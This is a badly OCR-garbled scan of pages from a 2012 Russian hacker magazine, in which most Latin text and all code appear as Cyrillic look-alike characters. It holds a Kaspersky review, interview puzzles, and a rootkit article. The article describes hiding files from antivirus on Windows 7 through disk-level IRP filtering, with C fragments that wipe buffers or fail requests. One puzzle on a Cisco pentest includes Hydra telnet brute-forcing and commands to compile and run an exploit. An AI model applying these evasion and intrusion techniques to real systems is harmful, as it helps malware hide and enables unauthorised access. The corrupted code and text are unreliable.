длительное время и затрудняют обратный анализ. К примеру, 
на момент извлечения экземпляров вредоносных плагинов из 
памяти зараженной системы ни один антивирусный продукт 
их не обнаруживал. 

Проблемы с полным анализом сложного вредоносного ПО воз- 
никают довольно часто, но лишь полный анализ может собрать 
весь пазл целиком и найти эффективные способы противодей- 
ствия таким угрозам. НЕ 



ХАКЕР 09/164/2012 



085 











МАШАКЕ 



Александр Лозовский 



КА5РЕР5КУ 

Іпіегпеі Бесигііу 

НОВАЯ ВЕРСИЯ 



ОБЗОР СВЕЖЕЙ ВЕРСИИ «КАСПЕРСКОГО» 

Меньше месяца прошло с момента выхода на прилавки и в интерне- 
ты новой версии Каспера (КАѴ и КІ5). По этому поводу можно было 
бы не напрягаться, если бы не некоторые нововведения, которые 
нам показались интересными, в связи с чем мы и решили намутить 
этот небольшой обзорчик. 



ГОРЯЧАЯ ЧЕТВЕРКА НАНОИННОВАЦИЙ 



БЕЗОПАСНЫЕ ПЛАТЕЖИ 

Самое интересное нововведение. Раньше 
пользователю нужно было самостоятельно 
включать режим безопасного браузера и вызы- 
вать экранную клавиатуру, что было слишком 
сложно для среднего пользователя. Скажите 
спасибо, что он вообще поставил антивирус! 
Спасибо, теперь он будет делать это (и кое-что 
еще) самостоятельно. Специальная система 
теперь будет распознавать обращение на сайт 
банка, проверять, не фишинговый ли этот 
сайт, сверять сертификаты и одновременно 
проверять систему (твою систему) на наличие 




критических уязвимостей. Разумеется, по- 
пытки других установленных на компьютере 
программ поинтересоваться информацией, с 
которой ты работаешь во включенном режиме 
«безопасных платежей», будут пресекаться. 

Комментарий ][: Реально полезная фича. 
Пользоваться ДБО становится геморройнее 
с каждым годом, и ничего с этим не поде- 
лаешь — безопасность и удобство всегда 
лежали на разных чашах весов. Хорошо, что 
хотя бы часть этой безопасности будет автома- 
тизирована. С многофакторной авторизацией, 
надеюсь, ты сам справишься, хотя и с ней в 
случае чего могут найтись помощники ;). 

□ ЗАЩИТА ВВОДА С КЛАВИАТУРЫ 

Виртуальная, защищенная от перехвата 
клавиатура, клавиши на которой надо нажимать 
мышкой, была и в прошлой версии. В новой 
версии добавили защиту ввода с аппаратной 
клавиатуры — она активизируется автоматиче- 
ски, когда ты обращаешься на сайт банка. 

АВТОМАТИЗИРОВАННАЯ БОРЬБА 
С ЭКСПЛОЙТАМИ 

Продукция АбоЬе, старые Іпіегпеі Ехріогег'ы 
и ^ѵа давно и прочно зарекомендовали себя 



самыми настоящими окнами, в которые зло- 
умышленнику достаточно лишь постучаться, 
а точнее — как следует долбануть по ним ехріоіі 
раск'ом. Новая версия Каспера отвечает экс- 
плойтам симметрично — добавив в свой продукт 
отдельную функцию защиты от эксплойтов, 
которая контролирует работу потенциально 
дырявых программ (ну, тех самых), проверяет, 
нетли в их действиях признаков экстремизма, 
и своевременно запрещаетто, что делать не 
полагается, — например, переход по подозри- 
тельным ссылкам или попытки записи в чужой 
процесс. 

Комментарий ][: Есть одна маленькая 
проблема. Вирмэйкеры имеют доступ ктемже 
версиям іпіегпеі зесигііу, что и обычные поль- 
зователи. Они используют этот факт в своей 
работе. Поэтому стопроцентную уверенность 
в том, что новый КІВ защититтебя от любой 
неизвестной угрозы, испытывать не приходит- 
ся. Обновлять ПО, быть хорошим мальчиком и 
шариться по совсем злостному іпарргоргіаіе 
сопіепі'у из-под виртуальной машины с Ли- 
нуксом или макосью (зато красиво!) все равно 
имеет смысл. 

ПОИСК УЯЗВИМОСТЕЙ 

Уследить за всеми потенциально 
уязвимыми программами вручную нетак 
просто — программ много, а уязвимости для 
них появляются каждый день. Новый Каспер 
имеет доступ к базе Весипіа — той самой, 
которая выпускаетзамечательную Весипіа 
РегзопаІ ВоЙѵѵаге Іпзресіог (РВІ) — программу, 
сканирующую установленный на компе софт 
на уязвимости. Теперь все эти удовольствия 
доступны из КІВ. Серьезно, Весипіа — отличная 
бесплатная прога с хорошей базой. Если у тебя 
нет денег на Каспера, поставь хотя бы ее вме- 
сте с каким-нибудь халявным антивирусом 
из наших обзоров. 
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Казрегзку Іпіегпеі: Зесигііу: новая версия 



КАІРЕ&5КУІ 
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Безопасные платежи 
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СКАНЕР 



Трудно удивить пользователя сигнатурным 
сканером. Монитор, быстрая проверка, полная 
проверка — все, как и раньше. Разве что рабо- 
тает чуть побыстрее. В «Лаборатории Каспер- 
ского» утверждают, что новая версия придется 
ко двору даже на нетбуках, — похоже, что так 
оно и есть, на моем стареньком Азиз ЕЕЕ РС 
1001 РХ с расширенной до 2 Гб РАМ в течение 
двух недель особых тормозов не наблюдается. 



РОДИТЕЛЬСКИЙ КОНТРОЛЬ 



Золотые нулевые закончились, и жизни 
подрастающему поколению теперь совсем 
не стало. В «жестокие» компьютерные игры 
играть — строго с 14 лет, прон смотреть — 
то ли с 18, то ли вообще с 21... В общем, 
интернеты бушуют, а общественные деятели 
настаивают, что надо держать, запрещать 
и не пущать. В деле борьбы со школьниками 



КІ5, а точнее — его модуль родительского 
контроля тоже может помочь. Контроль пере- 
писки, ІМ и социальных сетей? Пожалуйста! 
Ограничение времени работы в интернете? 
Легко! Только помни, что техническая за- 
щита — это одна сторона защиты, а правиль- 
ное воспитание — совершенно необходимая 
вторая. Да что тут говорить — большинство 
наших читателей — последнее поколение тех, 
кого некому было защищать от компьютеров, 
ЕТЫ-сетей и интернетов. Мы сами в детстве 
от них кого хочешь бы защитили :). Так что 
в этом плане мир в хороших руках. 



ЗАКЛЮЧЕНИЕ 



Всякому, кто имеет электронные деньги и хотя 
бы отдаленно знаком с текущей ситуацией 
в мире малвари, становится очевидно: пора 
переходить на пингвина. С другой сторо- 
ны, линукс — сакс и нот фо ворк (славно я 



ТАКЖЕ НА АРЕНЕ 



Диск аварийного 
восстановления 

Линуксовый загрузочный диск, который 
стоит использовать, если твоя система 
накрылась или залочилась окончательно. 
Автоматизирован он стопроцентно — конфиги 
править не надо, загружается сам собой, 
подхватывает интернет, качает обновление 
и сканируетжесткие диски. 

Восстановление 
после заражения 

Не секрет, что после лечения активного 
заражения нередко начинают появляться 
странные глюки и лишние диалоговые окошки, 
требующие от тебя какой-нибудь необходимый 
файл. Модуль восстановления после 
заражения помогает с этим справиться. 



вбросил, не так ли? :)), и, если даже Андрею 
«апсігизбоск» Матвееву не стыдно за винду на 
своих ноутбуках, то... в общем, придется поль- 
зоваться Іпіегпеі Зесигііу. В этом плане новые 
КІ5 и КАѴ — достойные продукты, которые 
наверняка найдут свое место на наших вин- 
довых машинах. У многих из наших они стоят 
на домашних машинах, и особых претензий к 
ним нет, но вот уже второй год мы не можем от- 
делаться от вопроса: где же ѴРЫ? Где же, где же 
в новом КІ5 секьюрный ѴРІМ, который защитит 
данные пользователя в недружественном ѴѴі-Еі 
(и не только) окружении? Что делать в незащи- 
щенных сетях в МсйопаІсГз и прочих публичных 
местах? Еще одна плохая новость: внезапно 
оказалось, что фичи отдельного запуска по- 
дозрительной программы в сэндбоксе теперь 
нет. Очень странно — как же теперь люди с ис- 
ключительно образовательными целями будут 
запускать кейгены? □С 
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МАШАКЕ 



Александр Эккерт (зіаппіс.тапйдтаіі.сот) 




Поймай меня, 

если сможешь 



Н-КОНЦЕПТ: СКРЫВАЕМ ФАЙЛЫ ПО-НОВОМУ 



Самое главное умение 
для руткита — это умение 
скрывать файлы. Именно 
оно позволяет ему выживать 
в мутной воде, под прицелом 
бдительных хипсов и 
проактивок. Ведь антивирусу 
для того, чтобы что-то 
проверить по своей базе, 
нужно наличие самого файла 
как минимум. Нет файла — 
нет руткита. Нет руткита — 
систему можно считать чистой, 
бодро вывешивая зеленые 
флажки. Ведь так? 

и для кого не секрет, что нынешние хваленые антивирусы 
делают ставку на сигнатурный поиск малвари, де-факто 
игнорируя (да-да, я знаю, что в рекламе пишут иначе) дру- 
гие способы детекта, такие как поведенческий анализ и эмуляция. 
Микко Хиппонен (Мікко Нурропеп), директор по исследованиям 
антивирусной компании Р-5есиге, сказал по поводу новоявленного 
чуда по имени РІатег, что разработчики антивирусов потерпели 
полное фиаско. «Какой от них толк, если вирусы свободно распро- 
страняются и работают годами. РІате успешно шпионил за пользо- 
вателями как минимум два года, и это оптимистичная оценка...» — 
посетовал Микко Хиппонен. 



ЧТО ИМЕЕМ? 



Свои файлы малварь обычно скрывает несколькими способами. 
Они все широко известны и, как правило, основываются на пере- 
хвате ѴѴіпАРІ-функций системы, предназначенных для работы 
с файловой системой, перечислением и просмотром папок и самих 
файлов. 



С ростом сложности руткитов (начиная с того момента, когда 
иметь драйвер уровня ядра для обеспечения стабильности руткита 
стало «модным трендом») функционал самозащиты, в том числе 
сокрытия файлов, был перемещен в ядро. Это и понятно, по- 
скольку при правильной организации найти сокрытый файл лишь 
средствами юзерспейса в таком случае вряд ли представится 
возможным. 

Способов сокрытия файлов в ядре на самом деле немного. 
Первый из них связан с перехватом определенных Ыаііѵе АРІ, 
предназначенных для низкоуровневой работы с файловой систе- 
мой, к примеру 2ѵѵ0реп РМе, 2ѵѵРеасІРіІе и так далее. Надо сказать, 
что такой подход широкого распространения «в боевых условиях» 
не получил, что легко объяснимо — уж больно быстро выявляется. 

Другой способ сокрытия файлов основан на перехвате ІРР- 
пакетов, составляющих основу взаимодействия драйверов и 
устройств между собой. Этот способ получил наиболее широкое 
распространение в паблике из-за своей малозаметности и довольно 
легкой реализации. Надо сказать, что именно перехват ІРР-пакетов 
(как для сокрытия файлов, так и для других зловредных целей) стал 
прямо-таки источником вдохновения для руткитостроителей. 

Затем настало затишье, сменившееся революционным про- 
рывом руткита Ризіоск, в котором впервые, если не ошибаюсь, 
была применена технология сокрытия, основанная на фильтрации 
операций с диском на самом низкомуровне — уровне драйвера 
аіарі.зуз. Последовавшее за Ризіоск'ом семейство руткитов Т01_/ 
Ю55 лишь немного усовершенствовало данную технологию. 

Основной же принцип остался без изменений — сокрытие «слу- 
жебных» файлов руткита происходило путем перехвата и измене- 
ния 5РВ-пакетов (5С5І Рециезі ВІоск) на самом низком уровне — 
уровне ІРР-хендлеров драйвера аіарі.зуз. 

С тех пор ничего оригинальнее такого способа придумано 
не было. Есть много вариаций на эту тему, однако суть везде оста- 
ется одна. 

У данного метода есть один существенный недостаток: 
так как руткиту приходится заражать системные драйверы, ему 
как-то надо выкручиваться при включенном Раде ЗиагсІ — техноло- 
гии, направленной на обеспечение целостности системного адрес- 
ного пространства. Кстати, на мой взгляд, эта технология довольно 
неплохо зарекомендовала себя в плане противостояния руткитам 
в ѴѴіп7, но также существенно осложнила жизнь разработчикам 
антивирусных защит, ведь для установки своих «хороших» хуков, 
скажем, поверх 550Т, также приходится обходить Раде биагсі. 



гтп 

На диск я выклады- 
ваю пару примеров 
файловых фильтров, 
позволяющих 
тебе отслеживать 
работус файловой 
системой. Готовых 
примеров сокрытия 
не дам, я жадный :). 

В статье описаны 
основные приемы, 
при должном уме- 
нии — ты сам най- 
дешь приемлемое 
решение. 



ІѴІѴІѴІ 

Если ты совсем не 
в теме — тебе сюда: 

ііпуигІ.сот/сѵѵгІо73 . 

Читай М50М- 
описание работы 
с файловыми 
фильтрами. Весот- 
тепсіесі ЬуМісгозоЙ! 
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Поймай меня, если сможешь 



Семерка становится все популярнее, скоро от поддержки «хрюши» 
МісгозоК откажется (да-да, у них там уже счетчик тикает), поэтому 
взгляды антивирусных компаний устремлены в будущее — глав- 
ным требованием для их программных продуктов стала поддержка 
ѴѴіпсІоѵѵз 7 (х32/х64), а в скором будущем — и «восьмерки», которая 
по всем прикидкам должна стать очень популярной системой. 

Надо сказать, что фильтрацию ІРР-пакетов можно наладить 
двумя способами. Первый, самый известный, основан на аттаче 
своего фильтра к стеку устройств, обслуживающих файловую 
систему. Такой способ очень хорош и надежен и хорошо докумен- 
тирован. Тем более что именно эта технология усиленно продвига- 
ется Майкрософтом как единственно верная и правильная. Второй 
способ — чистый хак, и он основан на перехвате кегпеі-функции 
ЫСаІЮгіѵег (кстати, в одном из прошлых номеров ][ я уже писал 
об этом универсальном способе перехвата). Сложность его заклю- 
чается в том, чтобы правильно определить нужный тебе ІРР-пакет, 
ведь в единицу времени ЫСаІЮгіѵег вызывается десятки тысяч 
раз и ее используют все устройства, каким не лень. 

Еще реже в природе встречается перехват ІРР-пакетов, осно- 
ванный на своеобразном «антианалоге» ІоГСаІЮгіѵег — функции 
завершения ЫСотрІеІеРециезС которая также обрабатывает 
ІРР-пакеты. 



ПРЕДВАРИТЕЛЬНЫЕ ИТОГИ 



Итак, подведу промежуточный итог: сокрыть файл для рутки- 
та — дело нужное, дело важное, однако с ростом защищенности 
ОС, о чем я писал выше, приходится идти на некий изврат — надо 
как-то решать проблемы с Раде ОиагсІ либо обходиться без патчей 
кегпеі-тетогу. 

Вообще, решить и ту и другую задачу в рамках ограничений «се- 
мерки» можно. Расписывать способы обхода Раде ОиагсІ я сегодня 
не буду, статья все-таки не об этом. Но вот пофантазировать насчет 
возможного зІеаШѵсокрытия файлов с использованием имеющих- 
ся технологий мы очень даже можем. 

Итак, поставим перед собой задачу — организовать на не- 
обходимом нам уровне сокрытие файлов в ѴѴіпсІоѵѵз «Бетегка», 
при этом не нервируя Раде СиагсІ. Сделать это, как оказывается, 
не так уж и тяжело, достаточно иметь некоторые навыки написания 
драйверов и иметь приблизительное понятие о том, как работает 
файловая система. 



ПОПРОБУЕМ НАПЕДАЛИТЬ КАКОЙ-НИБУДЬ КОД 



На практике реальных способов сокрытия файлов можно при- 
думать довольно много, и все они будуттак или иначе работать. 
Главное для нас сейчас — не трогать системную память, чтобы дать 
возможность драйверу работать в ѴѴіп 7+. 

Самое простое, что приходит в голову, — это заняться обработ- 
кой ІРР с кодом 1РР_МЗ_0Е\ЛСЕ_С01\1ТР01_, которые привлекаются 
к обработке таких контролкодов, как ІОСТІ__5С5І_РА55_ТНРОІІ0Н_ 
РІРЕСТ. 

Сделать это относительно легко, скажем, примерно так: 

рІгрБііаск = Іо6е1:Сиггеп1:Ігр51:аскІ.оса1:іоп( , рІгрѴ. 

і-Г (р!гр$1=аск->МадогРипс1:іоп == 1КР_т_РЕУ1СЕ_С01\1ТК0П 

і-р (рІгр51:аск->Рагате1:ег5 .РеѵісеІоСопІігоІ ЛоСоп1:го1 
Сосіе == І0СП_5С5І_РА55 = ТНК01ІСН_0ІКЕСТ) 

{ 

і-р (р Ігр->Ц5егВи-р-Рег != 0) 

{ 

і-Р ПКе6е1:Сиггеп1:Ігдір) 

Н і сі еМу Р і 1 е ( . . . ) ; 

} 

} 

} 

ь_ 



В самой процедуре сокрытия файла НісІеМуРіІеП, в принципе, 
нет ничего сложного: там необходимо реализовать обнуление поля 
рІгр->ІІ5егВи-р-Рег и имени файла, что можно сделать примерно так: 

гР_( !_мсзпістр( (РІлІСНАК) ( (Ш0Ме_РТК)ІІ5епВи-р-Рег + 0Х-Р2)., 
РіІеІѴІатеТоНісІе., )) 

{ 

// Затираем содержимое 

тетзе1:((РѴ0ІР')Ц5егВи-р-Рег , 0. ЦзегВи-р-РегІеп^ІіЮ ; 

тетзе1:( (РѴОІР) ( (Ц10І\І6_РТГОЦзегВи-р-Рег + Ѳх~Р2) , 0, 18); 

} 

Реализация такого «сокрытия» — это один из наиболее простых 
и предполагаемых вариантов. При обработке необходимо помнить 
о подводных камнях, например, надо предусмотреть различие 
между ІЧТРБ-индексами и самими файлами. 

Другой способ, приходящий в мою нетрезвую голову, — это про- 
сто дать по рукам обработчику ІРР-пакетов: 

рІгр->Іо$1:а1=и5 .ЗІіаІіиБ = 5ТАТи5_МОТ_ІМРІ_ЕМЕІ\ІТЕР; 
рІгр->Іо51:а1:и5 .Іп-Рогтаіііоп = 0; 

ІоСотр1е1:еКедие5І:(рІгр. ІО_№_ІМСКЕМЕ№~) ; 

Что называется, дешево и сердито. В результате при приеме 
нужных нам ІРР-пакетов мы просто говорим системе, что «этот 
столик не обслуживается», и система верит нам на слово. Как ре- 
зультат — пакет, посланный авером/системой, чтобы прочитать 
содержимое файла или узнать его имя, просто будет отброшен. 

Теперь о самом интересном — где все это отслеживать и филь- 
тровать. Наиболее эффективный и действенный способ — это при- 
аттачиться к устройству «\\0еѵісе\\0ізк» и парсить ІРР-пакеты там. 
Как правило, данное устройство создается драйвером аіарі.зуз, 
а ниже этого драйвера ничего нет — там только чтение/запись пор- 
тов жесткого диска. То есть данное решение обеспечит нам обход 
любых фильтров, установленных аверами. Кстати, именно такой 
подход используется в семействе руткитов Т0І_/Т055 и Ризіоск. 

Тут необходимо сказать, что фильтрация выше данного девайса 
при попытке сокрытия файла может привести к жесткому когни- 
тивному диссонансу у аверской проактивки. К примеру, если мы 
попытаемся спрятать файл в одном из «высоких» фильтров и при 
этом где-то ниже нас, над атапи, будет сидеть файловый фильтр 
авера, то это может привести к зависанию системы и даже к «сине- 
му экрану». 

Эту же схему сокрытия можно использовать практически во 
всех файловых фильтрах — как стандартных, рекомендуемых 
МісгозоЙ, так и самопальных, писанных на коленке. 

Кстати, насчеттой самой «рекомендуемой» МісгозоЙ техно- 
логии организации файловых фильтров, основанной на вызовах 
РІіРедізІегРіиег/РІіБіагіРіКеппд и так далее. Данная технология 
довольно успешно используется всеми аверскими прогами, филь- 
трующими работу с файлами. На диске ты найдешь один из таких 
примеров, который поможеттебе организовать свой файловый 
фильтр, а также потренироваться в технике сокрытия файлов. 



ВМЕСТО ЗАКЛЮЧЕНИЯ 



И опять старые сказки о главном. Прогресс не стоит на месте, раз- 
работчики аверов опять оказались в роли догоняющих. 

В тырнетах — новый аврал по имени РІате. Руткит, который 
в силу ограниченности распространения смог, по разным данным, 
от двух до пяти лет скрыто просуществовать в строго локализован- 
ной географической зоне. 

Все бы ничего, но только дело теперь в том, что с появлением 
этого руткита открылась новая страница в области ІТ-безопаснос- 
ти — теперь вирусы и руткиты начали использоваться как кибер- 
оружие. 

Что это? РІачало эпохи кибервойн? 

Читай ][, чтобы быть во всеоружии! ПЕ 
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6 ГЛАВНЫХ КНИГ О КОДИНГЕ 

Чтобы стать грамотным кодером, 
недостаточно много писать, нужно 
еще и много читать. Но что именно 
читать? Книг о программировании 
существует великое множество, и 
времени прочитать все точно ни у 
кого нет. Перед тобой первая часть 
обзора лучших книг по программи- 
рованию всех времен и народов. 
Здесьты найдешь как фундамен- 
тальную литературу об алгоритмах 
и проектировании кода, так и сбор- 
ники чисто практических советов. 
Почти все книги в списке нужно 
не просто читать, а перечитывать 
много раз вплоть до полного про- 
светления. 




КОДИНГ 



1ЛІІХОШ 






РАСЕ0РѴШР0ѴѴ5РН0МЕ 




АНАТОМИЯ СТРЕКОЗЫ 




98 


Продолжение статьи о разработке при- 
ложений для платформы ѴѴіпсІоѵѵз РЬопе 7. 


110 


ВБР мертв?Хватитнасиловать 
труп? Попробуйте рассказать это 


114 



На этот раз речь пойдет о дизайне разработчикам йгадопРІу ВБй — самому 

и разработке интерфейса. инновационному«дьяволенку». 



СКРЫТЫЕ РЕЗЕРВЫ 

Переключение между видеокартам и — 
головнаябольдлялюбоголинуксоида, 
делающая невозможной нормальную 
работу с 6 РУ. Как решить эту проблему? 



5ѴЫ/АСК 



РЕККІІМ 




124 



ГРОЗОВЫЕ ОБЛАКА 

Подробный сравнительный обзор 
решений для построения полноценной 
облачной инфраструктуры — для офиса 
и для личного пользования. 



130 


КУЗНИЦАСТРЕСС-ТЕСТОВ 

Обзор Тэипд — многофункциональной 


136 




системы нагрузочного тестирования 





для широкого круга клиент-серверных 
приложений. 



ВЕЛИКОЕ КИТАЙСКОЕ ПРОИЗВОДСТВО 

Уникальный репортаж из Шэньчжэня, с 
фабрики компании ТР-ИЫ К, из которо- 
го ты узнаешь многое об ІТ-индустрии 
удивительного Китая. 
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Павел Александрович (іѵіпзісіе.ЫодзроЦсопп] 



Задачи 

на собеседованиях 



ПОДБОРКА 

ИНТЕРЕСНЫХ 

ЗАДАНИЙ, 

КОТОРЫЕ ДАЮТ 
НА СОБЕСЕДОВАНИЯХ 



Салютую вам, мои дражайшие 
читатели! Сегодня мы продолжим 
наше темное дело — решение 
задач с собеседований. 




Задача № 1 

УСЛОВИЕ 

Четырем туристам нужно ночью переправиться через реку по 
подвесному мосту. Мост уже сильно обветшал, в настиле есть 
дыры, и он может выдержать одновременно не более двух 
человек (если на мосту окажется более двух человек, мост об- 
рушится]. Туристам нужно освещать дорогу фонариком — иначе 
они могут провалиться в дыру в настиле моста и погибнуть, но 
у них есть только один фонарик. Эти четыре человека пере- 
двигаются с разной скоростью. Адам может перейти мост за 
одну минуту, Лари — за две минуты, Эджу нужно пять минут, 
самый медлительный из всех Боно — ему потребуется десять 
минут, чтобы перейти мост. Ровно через семнадцать минут мост 
обрушится. Каким образом все четверо могут успеть через него 
переправиться? 

РЕШЕНИЕ 

У задачи существует два варианта решения. Оба они основаны на 
том, что Эджу и Боно нужно переходить мост вместе. Так они сэко- 
номят наибольшее количество времени. 

Первый вариант (в скобкахуказано прошедшее время): 

1. Адам и Лари переходят мост (2 минуты). 

2 . Адам возвращается (3 минуты). 

3. Адам передает фонарь Эджу и Боно, они переходят (13 минут). 

4 . Лари возвращается с фонарем (15 минут]. 

5 . Адам и Лари переходятмоствместе (17 минут). 



Второй вариант: 

1. Адам и Лари переходят мост (2 минуты]. 

2 . Лари возвращается (4минуты). 

3. Лари передает фонарь Эджу и Боно, они переходят (14 минут]. 

4 . Адам беретфонарь и возвращается за Лари (Ібминут). 

5 . Адам и Лари переходятмоствместе (17 минут]. 

Задача № 2 

УСЛОВИЕ 

В деревне, где живет пятьдесят семейных пар, каждый из мужей 
изменял своей жене. Каждая из женщин в этой деревне, кактолько 
кто-то из мужчин изменил своей жене, немедленно узнает об этом 
(всем известно, как быстро распространяются сплетни в маленьких 
городках], если только это не ее собственный муж (о своих бедах 
каждый узнает последним). Законы этой деревни требуют, чтобы 
женщина, получившая доказательства неверности своего мужа, 
убила его в тот же день. Ни одна из женщин не может ослушаться. 

В селение приезжает королева, славящаяся своей непогрешимо- 
стью. Она объявляет жителям, что по крайней мере один из мужчин 
деревни совершил супружескую измену. Что произойдет? 

РЕШЕНИЕ 

Эта великолепная задача является классической среди логи- 
ческих головоломок, впервые она была представлена в книге 
физика Джорджа Гамоу и математика Марвина Стерна РиггІе-МаіЬ 
(«Математические головоломки») в 1958 году. Правда, в их версии 
фигурировали неверные жены. 
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Многие читатели подумают, что королева не сказала ниче- 
го нового жителям. Жены и так знают об изменах 49 мужей. Но 
действительно ли это так? Представим ситуацию, когда в деревне 
всего один неверный муж. Тогда его жена убила бы его сразу после 
заявления королевы — ведь она не знала об изменах других му- 
жей. Однако убийства не происходит, и это информирует всех, что 
неверных мужей больше одного — по крайней мере два. И если не- 
верных мужей было бы только два, их жены убили бы их на второй 
день, а если бы их было три — жены бы убили их на третий день, и 
так далее. И если бы их было сорок девять — их сорок девять жен 
убили бы их на сорок девятый день. 

Таким образом, через каждые сутки, которые прошли без 
убийств мужчин, становится общепонятной истиной, что коли- 
чество гулящих мужчин стало больше на единицу. До тех пор, 
пока это общепринятое знание не превысит число, которое знает 
женщина. Это будет означать, что изменяет ее муж, и она убьет 
его. Ответ: в первые 49 дней ничего не произойдет, а на 50-й день 
случится кровавая бойня. 

Задача № 3 

УСЛОВИЕ 

Во время проведения пентеста вам в распоряжение предоставлено 
оборудование Сізсо на базе 105. Задача — максимально быстро об- 
наружить уязвимости в оборудовании. Опишите последовательность 
ваших действий (в том числе выполняемых команд), которые по- 
зволят выявить максимальное количество возможных уязвимостей в 
предоставленном оборудовании. Примечание: вы обладаете полным 
доступом к указанному оборудованию. 

РЕШЕНИЕ 

Для обнаружения уязвимостей следует выполнить 
четыре незатейливых действия: 

1. Определить версию оборудования (этообычно написано на кор- 
пусеустройства). 

2 . Поискать в интернете существующие уязви мости для опреде- 
ленной версии оборудования (например, запрос в доодіе. сот: 
«Уязвимости Сізсо 2600»). 

3. Определить версию 105. При подключении к оборудованию Сізсо 
выдается сообщение о версии операционки, например: 

Сізсо Іпіегпеіыогк Орега1:іп§ Бузіегп Бо-Рімаге 

ІОБ (іт) С2600 Бо-Ріыаге (С2600-І5-М)^Ѵегзіоп 12.3(3), 

КЕІ.ЕА5Е БОРТЫАКЕ (~Рс2) 

Также можно узнать с помощью следующей команды: 

>зііоы ѵепзіоп 



4 . Поискать в интернете существующие уязви мости для опреде- 
ленной версии 105 (например, запрос в доодіе. сот: «Уязвимости 
Сізсо 105 12.0», также ищем сообщения безопасности на сайте 
производителя — сізсо.сот ). 

Для устранения уязвимостей можно проделать следующие шаги: 

1. Если есть возможность, то обновить версию 105: 

з б ом Оазіі 

сіеіеііе Лазіі: ОБ.Ьіп 
со ру і-Рір ПазЬ_ 
геіоасі 



2 . Установить время: 

>епаЫе 

#с!оск зеі: 18:41:10 18 диі 2012 



3. Сменить пароль привилегированного и пользовательского 
режимов с шифрованием: 

>епаЫе 

#сопб§ іегтіпаі 

(сопб§)#епаЫе зесгеі: ПАРОЛЫ 

(сопб§)#зегѵісе раззмопсі-епспурііоп 

(сопб§)#1іпе аих 0 

(сопб§-1іпе)#1о§іп 

(сопб§-1іпе)#ра55могсІ ПАРОЛЬ2 

(сопб§-1іпе) )#1іпе сопзоіе 0 

(сопб§-1іпе)#1о§іп 

(сопб§-1іпе)#раззмопсІ ПАРОЛЬЗ 

(сопб§-1іпе) )#1іпе ѵіу 0 0 

(сопб§-1іпе)#1о§іп 

(сопб§-1іпе)#раззмогсІ ПАР0ЛБ4 

(сопб§-1іпе)#по зегѵісе раззмогсі-епспурііоп 

(сопб§-1іпе)#/ѵ 2 

4 . Сохраним конфигурацию, для ее загрузки перед запуском 
#гиппіп§-сопб§ 5І:аг1:ир-сопб% 

5 . Отключим управление через НТТР, НТТР5, СОР: 

(сопб§)#по ір ІтСір зепѵег 
(сопбе)#по ір ІтЕір зесиге-зегѵег 
(сопб§)#по ссір гип 

6. Настроим МСЭ соответствующим образом, ниже примерзапрета 
РТР-трафика: 

#ассезз-1із1: 110 сіепѵ іср апу апу ед -Рір 

Для выявления уязвимостей, а попросту говоря взлома нашего 
девайса можно сделать следующее. 

1. Взломатьвручнуюили используя программы. Пробуем подклю- 
читься поіеіпеі: 

>іе1пеі 192.168.1.2 

и ввести логин- пароль, заданные по умолчанию (Сізсо:Сізсо). 
Если не помогло, то пробуем метод ЬгіЛеіюгсе: можно перебрать 
пароли для іеіпеі, используя ТНС-Нубга. Например, так: 

Иѵсіга 192.168.1.2 сізсо -Р ./список-паролей -і 30 

2 . Найти и скачать эксплойты для соответствующего вида 105. 

Для этого можно сделать запрос типа «105 12.0 ехріоіі». Также 
можно воспользоваться поиском по сайтам с эксплойтами 
(например, на ехрІоіі-сІЬ.сот ) и, следуя прилагающимся к ним 
инструкциям, воспользоваться уязвимостью. Для этого может 
потребоваться компилировать эксплойт. Для языка С команда 
может быть следующая: 

>§сс ехріоіі.с -о ехріоіі 

После этого выполнить эксплойт: 

>. /ехріоіі: 192.168.1.2 80 

Либо, если язык интерпретируемый, сразу выполнить. Пример 
для языка РиЬу: 

>гиЬу ехрІріі.гЬ 192.168.1.2 80 
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Задача № 4 



УСЛОВИЕ 

Нужно нарисоватыаблицу с большим количеством 
столбцов. Чтобы таблица уместилась в экран, 
заголовки столбцов решили выводить вертикаль- 
но. Придумайте и реализуйте кроссбраузерное 
решение для вывода вертикальных заголовков. 
Браузеры: ІЕ6+, РР3.0+, Орега 9.5+, СЬготе4.0+. 

РЕШЕНИЕ 

Одна из немногих задач, где решение для Іпіегпеі 
Ехріогег является самым простым, — в нем, 
согласно рекомендациям ѴѴЗС, реализовано свой- 
ство ѵѵгШпд-тосІе. Другие разработчики отличи- 
лись каждый по-своему — в Рігеіюх есть свойство 
-тог-ігапзіюгт, Орега предлагает использовать 
-о-ігапзіюгт, ну а разработчики движка ѴѴеЬкіІ 
(он применяется в браузерах ЗаІ'агі и СЬготе) при- 
думали -ѵѵеЬкіМгапз^огт. 

Следующая проблема подстерегает нас в 
браузерах Еігеіюх, Орега 10.51, За^агі 3.5, СЬготе: 
при повороте текста поворачивается и сам блок 
с текстом таким образом, что длина и ширина 
блока меняются местами. Текст может заехать на 
выше- и нижестоящие блоки. Поэтому следует 
предусмотреть замену длины на ширину после 
трансформации текста. 

И наконец, косяк со старыми браузерами — 
Орега версии ниже 10.51 и Рігеіюх версии ниже 3.5. 
Придется отлавливать эти браузеры с помощью 
ЗаѵаЗсгірІ и поворачивать текст с помощью 5Ѵ6. 
Поскольку в 5Ѵ6 нет автоматического переноса 
строк, повернутый текст будет в одну строку. Это 
придется учесть и динамически изменить размер 
блока так, чтобы текст не обрезался. Окончатель- 
ное решение выглядит следующим образом: 
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Решение задачки с необычными таблицами 



В СЛЕДУЮЩЕМ ВЫПУСКЕ 



1. Естьтаблица М на N. В левой верхней 
клеткеП, 1) находится муравей. Заодинход 
муравей может передвигаться либо на одну 
клетку вниз, либо на одну клетку вправо. 
Напишите программу, которая считает 
количество всехпутей муравья източки (1, 

1) вточку (М, N1. 

2. Объекты класса ОЬіесІѴѴіІЬНазЬ предпола- 
гается использовать в качестве ключей для 
НазЬМар. Укажите все ошибки вданном коде: 

риЫіс сіазз ОЬдесІіІлІіІібНазб { 
іпі: і сі; 

риЫіс ѵоісі з е 1: 1 сі (Іопе ісО ( 

ісі = ісі; 

} 



ргіѵаіе іпі базбСосІе()^[ 

геіигп ^ епегаіеНазбСосІеП : 



ргоіесіесі іпі ^епепаІіеНазІіСосІеП { 
Іпіе^еп зеесі = Маіб. папсІошП 
< 10-Р ? пиіі : 700: 
геіигп пеы Ра псІогпГ зеесі ) . пехіІпіО ; 

} 

риЫіс Ьооіеап 

едиа1з(0Ьіес1=ІлІі1=ІіНа5Іі рЬті 

{ 

і-р (оЬд.ісІ == ісі ) 

геіигп ігие: 

геіигп -Раізе; 

} 

■Ь- 



